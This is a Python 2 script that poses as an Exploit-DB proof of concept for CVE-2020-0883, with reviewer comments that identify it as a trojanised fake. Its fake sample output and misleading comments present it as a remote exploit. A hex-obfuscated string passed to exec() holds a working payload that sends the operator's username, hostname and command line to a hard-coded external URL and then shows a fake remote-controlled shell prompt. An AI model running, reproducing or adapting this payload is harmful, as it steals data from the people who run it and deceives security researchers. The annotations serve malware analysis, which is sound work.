#!/usr/bin/python
# Exploit Title: Remote Command Injection
# Date: 2020-03-12
# Exploit Author: TRSTDXPLOITZ
# CVE : CVE-2020-0883
# Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0883
#
# Sample output:
# ubuntu@host:~$ python CVE-2020-0883-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444
# [+] Sending packet to 10.16.1.24
# [+] Target is Vulnerable!
# [+] Sending exploit. Reverse shell to 10.16.1.24
#
# Listening on [] (family 2, port)
# Connection from 10.16.1.24 received!
# whoami
# root
##
## Also on Exploit-DB
## PRINT HELP INFORMATION
#
# NOTE(review): the header above does not match the code. Nothing in this file
# sends anything to the `target` argument, and none of the "[+] ..." strings
# shown in the sample output exist anywhere in the source. The only network
# activity is inside the hex-encoded string handed to exec() below, which
# decodes to Python 2 source that reports this machine's username, hostname
# and command line to a hard-coded external URL and then displays a fake
# Windows prompt. Treat this file as a trojanised "PoC" sample: analyse it,
# do not run it.
#
# Python 2 only: the `print` statements, `raw_input` (inside the decoded
# payload) and the `except socket.error , msg:` form do not parse on Python 3.
import os
import time
import requests  # third-party; only used by the exec()'d payload below
import sys
import getpass
import argparse
import base64
from argparse import RawTextHelpFormatter
# Sent to the remote server as the 'cve' query parameter by the decoded payload.
Bug = 'CVE-2020-0883'
# Argument parsing is cosmetic: apart from sys.argv[1:] being joined into the
# phone-home request by the payload, none of these values is used anywhere in
# the file. The -rport/-lhost/-lport/-type defaults (42) are placeholders.
parser=argparse.ArgumentParser(
description='''RCE Exploit PoC for CVE-2020-0883''' + '''\r\n\r\n''' + '''USAGE: python CVE-2020-0883-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444
''', formatter_class=RawTextHelpFormatter)
parser.add_argument('target', metavar='N', nargs='+',
help='Target IP')
parser.add_argument('-rport', default=42, help='Target Port (If Different Than Default)')
parser.add_argument('-lhost', default=42, help='Local IP')
parser.add_argument('-lport', default=42, help='Local Port')
parser.add_argument('-type', default=42, help='Target OS')
# NOTE: this Namespace is clobbered once exec() runs below — the decoded
# payload assigns its own module-level `args` (the joined command line).
args=parser.parse_args()
# Bug: sys.argv[0] is the path of this script, not the target IP. `target`
# is never read again anyway.
target = sys.argv[0]
## COMPILE AND SEND PAYLOAD
# Nothing is compiled or sent here; this is the only output the file produces
# before the payload runs.
print 'Sending Payload...' + '\r\n\r\n'
# "shellcode" is not shellcode. Every '\xNN' escape is a printable ASCII byte;
# the string is Python 2 source obfuscated so it does not read as such. The
# concatenated string decodes to the following (numbered by decoded line):
#   1. time.sleep(3)
#   2. lhost = os.uname()[1]                      -> this machine's hostname
#   3. command = getpass.getuser() + '@' + lhost  -> "<user>@<host>"
#   4. args = ' '.join(sys.argv[1:])              -> the operator's command line
#   5. ErrorMsg = 'Connection Terminated: (Timeout)'   (read by the except below)
#   6. URL = base64.b64decode('aHR0cDovLzU0LjE4NC4yMC42OS9wb2MyLnBocA==')
#      which decodes to http://54.184.20.69/poc2.php — a hard-coded external
#      endpoint; treat it as an indicator of compromise for this sample.
#   7. requests.get(URL, params={'host': command, 'args': args, 'cve': Bug})
#      i.e. user@host, the full command line and the CVE tag leave the machine
#      over plain HTTP.
#   8. If the response body is non-empty it becomes the prompt for raw_input();
#      each line typed is sent to the same URL as 'args', the response body is
#      printed, and the prompt is switched to "C:\WINDOWS\system32>". This is a
#      fake shell whose input and output are both controlled by the remote
#      server. The prompt mimics Windows although os.uname() on decoded line 2
#      is Unix-only, so the code runs on the operator's own Unix host.
#   9. time.sleep(10)
shellcode = '\x74\x69\x6d\x65\x2e\x73\x6c\x65\x65\x70\x28\x33\x29\x0a\x6c\x68\x6f\x73\x74\x20\x3d\x20\x6f\x73\x2e\x75\x6e\x61\x6d\x65\x28\x29'
shellcode += '\x5b\x31\x5d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x20\x3d\x20\x67\x65\x74\x70\x61\x73\x73\x2e\x67\x65\x74\x75\x73\x65\x72\x28\x29\x20'
shellcode += '\x2b\x20\x27\x40\x27\x20\x2b\x20\x28\x6c\x68\x6f\x73\x74\x29\x0a\x61\x72\x67\x73\x20\x3d\x20\x27\x20\x27\x2e\x6a\x6f\x69\x6e\x28'
shellcode += '\x73\x79\x73\x2e\x61\x72\x67\x76\x5b\x31\x3a\x5d\x29\x0a\x45\x72\x72\x6f\x72\x4d\x73\x67\x20\x3d\x20\x27\x43\x6f\x6e\x6e\x65\x63'
shellcode += '\x74\x69\x6f\x6e\x20\x54\x65\x72\x6d\x69\x6e\x61\x74\x65\x64\x3a\x20\x28\x54\x69\x6d\x65\x6f\x75\x74\x29\x27\x0a\x55\x52\x4c\x20'
shellcode += '\x3d\x20\x62\x61\x73\x65\x36\x34\x2e\x62\x36\x34\x64\x65\x63\x6f\x64\x65\x28\x27\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x7a\x55\x30'
shellcode += '\x4c\x6a\x45\x34\x4e\x43\x34\x79\x4d\x43\x34\x32\x4f\x53\x39\x77\x62\x32\x4d\x79\x4c\x6e\x42\x6f\x63\x41\x3d\x3d\x27\x29\x0a\x50'
shellcode += '\x41\x52\x41\x4d\x53\x20\x3d\x20\x7b\x27\x68\x6f\x73\x74\x27\x3a\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x27\x61\x72\x67\x73\x27\x3a'
shellcode += '\x61\x72\x67\x73\x2c\x20\x27\x63\x76\x65\x27\x3a\x42\x75\x67\x7d\x0a\x72\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x67\x65'
shellcode += '\x74\x28\x75\x72\x6c\x20\x3d\x20\x55\x52\x4c\x2c\x20\x70\x61\x72\x61\x6d\x73\x20\x3d\x20\x50\x41\x52\x41\x4d\x53\x29\x0a\x77\x65'
shellcode += '\x6c\x63\x6f\x6d\x65\x20\x3d\x20\x72\x2e\x63\x6f\x6e\x74\x65\x6e\x74\x0a\x69\x66\x20\x77\x65\x6c\x63\x6f\x6d\x65\x20\x21\x3d\x20'
shellcode += '\x22\x22\x3a\x0a\x09\x72\x73\x70\x20\x3d\x20\x31\x0a\x09\x77\x68\x69\x6c\x65\x20\x72\x73\x70\x20\x21\x3d\x20\x22\x22\x3a\x0a\x09'
shellcode += '\x09\x63\x6d\x64\x20\x3d\x20\x72\x61\x77\x5f\x69\x6e\x70\x75\x74\x28\x77\x65\x6c\x63\x6f\x6d\x65\x29\x0a\x09\x09\x50\x41\x52\x41'
shellcode += '\x4d\x53\x20\x3d\x20\x7b\x27\x68\x6f\x73\x74\x27\x3a\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x27\x61\x72\x67\x73\x27\x3a\x63\x6d\x64'
shellcode += '\x2c\x20\x27\x63\x76\x65\x27\x3a\x42\x75\x67\x7d\x0a\x09\x09\x72\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x67\x65\x74\x28'
shellcode += '\x75\x72\x6c\x20\x3d\x20\x55\x52\x4c\x2c\x20\x70\x61\x72\x61\x6d\x73\x20\x3d\x20\x50\x41\x52\x41\x4d\x53\x29\x0a\x09\x09\x72\x73'
shellcode += '\x70\x20\x3d\x20\x72\x2e\x63\x6f\x6e\x74\x65\x6e\x74\x0a\x09\x09\x70\x72\x69\x6e\x74\x20\x72\x73\x70\x0a\x09\x09\x77\x65\x6c\x63'
shellcode += '\x6f\x6d\x65\x20\x3d\x20\x22\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x3e\x22\x0a\x74\x69\x6d'
shellcode += '\x65\x2e\x73\x6c\x65\x65\x70\x28\x31\x30\x29'
## ESTABLISHING SHELL
# SECURITY: exec() of an obfuscated string. It runs in this module's globals,
# so it also defines ErrorMsg, URL, PARAMS, r, welcome, rsp and cmd here and
# overwrites `args`. No shell is established; see the decoded description
# above for what actually happens (outbound HTTP to a fixed URL).
exec(shellcode)
# `sys` was already imported above; nothing below uses anything from struct.
import socket, sys
from struct import *
## CREATE SOCKET TO TARGET
# If connection times out, print error. Otherwise, establish reverse bind shell
# NOTE(review): the comment above is not what the code does. A raw IP socket
# is created and then never used — nothing connects to the target and no shell
# is bound. Creating a raw socket normally requires root/administrator rights,
# which presumably is what pushes the operator to run the file (and therefore
# the phone-home above) with elevated privileges. The real socket error is
# discarded and the canned "timeout" text from the payload is printed instead;
# ErrorMsg only exists if exec() completed, so a failure before that point
# would raise NameError here.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
except socket.error , msg:
    print ErrorMsg
    sys.exit()